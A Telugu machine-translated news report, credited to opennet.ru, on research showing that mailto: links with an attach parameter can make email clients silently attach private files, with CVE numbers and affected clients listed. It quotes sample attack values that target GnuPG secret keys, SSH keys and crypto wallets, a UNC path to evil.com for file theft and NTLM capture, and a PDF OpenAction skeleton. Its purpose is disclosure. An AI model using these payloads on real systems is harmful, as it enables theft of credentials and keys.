"mailto:" లింక్‌లను ఉపయోగించి ఇమెయిల్ క్లయింట్ వినియోగదారులపై దాడి చేయడం

రూర్ యూనివర్సిటీ బోచుమ్ (జర్మనీ) పరిశోధకులు విశ్లేషించారు (PDF) అధునాతన పారామితులతో “mailto:” లింక్‌లను ప్రాసెస్ చేస్తున్నప్పుడు మెయిల్ క్లయింట్‌ల ప్రవర్తన. పరిశీలించిన ఇరవై ఇమెయిల్ క్లయింట్‌లలో ఐదుగురు "అటాచ్" పరామితిని ఉపయోగించి వనరుల ప్రత్యామ్నాయాన్ని మార్చిన దాడికి గురయ్యే అవకాశం ఉంది. అదనంగా ఆరు ఇమెయిల్ క్లయింట్లు PGP మరియు S/MIME కీ రీప్లేస్‌మెంట్ దాడికి గురయ్యే అవకాశం ఉంది మరియు ముగ్గురు క్లయింట్లు ఎన్‌క్రిప్టెడ్ మెసేజ్‌ల కంటెంట్‌లను సేకరించేందుకు దాడికి గురయ్యే అవకాశం ఉంది.

లింకులు «mailto:"లింక్‌లో పేర్కొన్న చిరునామాదారునికి లేఖ రాయడానికి ఇమెయిల్ క్లయింట్ తెరవడాన్ని ఆటోమేట్ చేయడానికి ఉపయోగిస్తారు. చిరునామాతో పాటు, మీరు లింక్‌లో భాగంగా లేఖ యొక్క విషయం మరియు సాధారణ కంటెంట్ కోసం టెంప్లేట్ వంటి అదనపు పారామితులను పేర్కొనవచ్చు. ప్రతిపాదిత దాడి "అటాచ్" పరామితిని తారుమారు చేస్తుంది, ఇది సృష్టించబడిన సందేశానికి అటాచ్‌మెంట్‌ను జోడించడానికి మిమ్మల్ని అనుమతిస్తుంది.

మెయిల్ క్లయింట్‌లు Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL నోట్స్ (CVE-2020-4089) మరియు పెగాసస్ మెయిల్ మిమ్మల్ని స్వయంచాలకంగా పనికిమాలిన దాడికి గురి చేస్తాయి. ఏదైనా స్థానిక ఫైల్, “mailto:?attach=path_to_file” వంటి లింక్ ద్వారా పేర్కొనబడింది. హెచ్చరికను ప్రదర్శించకుండా ఫైల్ జోడించబడింది, కాబట్టి ప్రత్యేక శ్రద్ధ లేకుండా, అటాచ్‌మెంట్‌తో లేఖ పంపబడుతుందని వినియోగదారు గమనించకపోవచ్చు.

ఉదాహరణకు, “mailto: వంటి లింక్‌ని ఉపయోగించడం:[ఇమెయిల్ రక్షించబడింది]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" మీరు GnuPG నుండి ప్రైవేట్ కీలను అక్షరంలోకి చొప్పించవచ్చు. మీరు క్రిప్టో వాలెట్లు (~/.bitcoin/wallet.dat), SSH కీలు (~/.ssh/id_rsa) మరియు వినియోగదారుకు ప్రాప్యత చేయగల ఏవైనా ఫైల్‌ల కంటెంట్‌లను కూడా పంపవచ్చు. అంతేకాకుండా, “attach=/tmp/*.txt” వంటి నిర్మాణాలను ఉపయోగించి మాస్క్ ద్వారా ఫైల్‌ల సమూహాలను అటాచ్ చేయడానికి Thunderbird మిమ్మల్ని అనుమతిస్తుంది.

స్థానిక ఫైల్‌లతో పాటు, కొన్ని ఇమెయిల్ క్లయింట్లు IMAP సర్వర్‌లోని నెట్‌వర్క్ నిల్వ మరియు పాత్‌లకు లింక్‌లను ప్రాసెస్ చేస్తాయి. ప్రత్యేకించి, IBM గమనికలు “attach=\\evil.com\dummyfile” వంటి లింక్‌లను ప్రాసెస్ చేస్తున్నప్పుడు నెట్‌వర్క్ డైరెక్టరీ నుండి ఫైల్‌ను బదిలీ చేయడానికి మిమ్మల్ని అనుమతిస్తుంది, అలాగే దాడి చేసేవారిచే నియంత్రించబడే SMB సర్వర్‌కు లింక్‌ను పంపడం ద్వారా NTLM ప్రమాణీకరణ పారామితులను అడ్డగించవచ్చు. (అభ్యర్థన ప్రస్తుత ప్రమాణీకరణ పారామితుల వినియోగదారుతో పంపబడుతుంది).

Thunderbird “attach=imap:///fetch>UID>/INBOX>1/” వంటి అభ్యర్థనలను విజయవంతంగా ప్రాసెస్ చేస్తుంది, ఇది IMAP సర్వర్‌లోని ఫోల్డర్‌ల నుండి కంటెంట్‌ని జోడించడానికి మిమ్మల్ని అనుమతిస్తుంది. అదే సమయంలో, IMAP నుండి తిరిగి పొందిన సందేశాలు, OpenPGP మరియు S/MIME ద్వారా గుప్తీకరించబడి, పంపే ముందు మెయిల్ క్లయింట్ ద్వారా స్వయంచాలకంగా డీక్రిప్ట్ చేయబడతాయి. థండర్‌బర్డ్ డెవలపర్‌లు తెలియజేసారు ఫిబ్రవరిలో సమస్య గురించి మరియు సంచికలో థండర్బర్డ్ 78 సమస్య ఇప్పటికే పరిష్కరించబడింది (థండర్‌బర్డ్ శాఖలు 52, 60 మరియు 68 దుర్బలంగా ఉన్నాయి).

థండర్‌బర్డ్ యొక్క పాత వెర్షన్‌లు పరిశోధకులు ప్రతిపాదించిన PGP మరియు S/MIMEలపై మరో రెండు దాడి వేరియంట్‌లకు కూడా హాని కలిగిస్తాయి. ప్రత్యేకించి, Thunderbird, అలాగే OutLook, PostBox, eM Client, MailMate మరియు R2Mail2, మెయిల్ క్లయింట్ స్వయంచాలకంగా S/MIME సందేశాలలో ప్రసారం చేయబడిన కొత్త సర్టిఫికేట్‌లను స్వయంచాలకంగా దిగుమతి చేసి, ఇన్‌స్టాల్ చేయడం వలన కీ రీప్లేస్‌మెంట్ దాడికి గురయ్యాయి. వినియోగదారు ఇప్పటికే నిల్వ చేసిన పబ్లిక్ కీల ప్రత్యామ్నాయాన్ని నిర్వహించడానికి దాడి చేసే వ్యక్తి.

రెండవ దాడి, థండర్‌బర్డ్, పోస్ట్‌బాక్స్ మరియు మెయిల్‌మేట్‌లకు అవకాశం ఉంది, డ్రాఫ్ట్ సందేశాలను స్వయంచాలకంగా సేవ్ చేయడానికి మెకానిజం యొక్క లక్షణాలను తారుమారు చేస్తుంది మరియు మెయిల్‌టో పారామితులను ఉపయోగించి, ఎన్‌క్రిప్టెడ్ సందేశాల డిక్రిప్షన్ లేదా ఏకపక్ష సందేశాల కోసం డిజిటల్ సంతకాన్ని జోడించడాన్ని ప్రారంభించడానికి అనుమతిస్తుంది. దాడి చేసేవారి IMAP సర్వర్‌కు ఫలితం యొక్క తదుపరి ప్రసారం. ఈ దాడిలో, సైఫర్‌టెక్స్ట్ “బాడీ” పరామితి ద్వారా ప్రసారం చేయబడుతుంది మరియు దాడి చేసేవారి IMAP సర్వర్‌కు కాల్‌ని ప్రారంభించడానికి “మెటా రిఫ్రెష్” ట్యాగ్ ఉపయోగించబడుతుంది. ఉదాహరణకి: ' '

వినియోగదారు పరస్పర చర్య లేకుండా “mailto:” లింక్‌లను స్వయంచాలకంగా ప్రాసెస్ చేయడానికి, ప్రత్యేకంగా రూపొందించిన PDF పత్రాలను ఉపయోగించవచ్చు - PDFలోని OpenAction చర్య పత్రాన్ని తెరిచేటప్పుడు స్వయంచాలకంగా mailto హ్యాండ్లర్‌ను ప్రారంభించేందుకు మిమ్మల్ని అనుమతిస్తుంది:

%PDF-1.5
1 0 obj
<< /రకం /కాటలాగ్ /ఓపెన్ యాక్షన్ [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——PGP సందేశాన్ని ప్రారంభించండి—[…])>>
endobj

"mailto:" లింక్‌లను ఉపయోగించి ఇమెయిల్ క్లయింట్ వినియోగదారులపై దాడి చేయడం

మూలం: opennet.ru

ఒక వ్యాఖ్యను జోడించండి